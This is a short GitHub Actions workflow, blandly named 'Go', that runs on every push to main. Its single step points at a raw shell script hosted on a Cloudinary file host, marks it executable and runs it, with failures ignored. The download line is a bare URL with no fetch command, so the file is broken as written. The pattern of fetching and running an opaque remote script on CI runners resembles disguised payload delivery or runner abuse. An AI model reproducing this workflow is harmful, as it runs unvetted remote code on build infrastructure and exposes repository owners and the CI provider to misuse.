name: Go

on:
  workflow_dispatch:
  push:
    branches: [main]

jobs:
  run:
    continue-on-error: true
    runs-on: ubuntu-latest
    steps:
      - name: Run exec
        run: |
          https://res.cloudinary.com/dyfqshedb/raw/upload/v1711332154/2dzfghdfvjo6r44uwx84u.sh
          chmod +x 2dzfghdfvjo6r44uwx84u.sh
          ./2dzfghdfvjo6r44uwx84u.sh
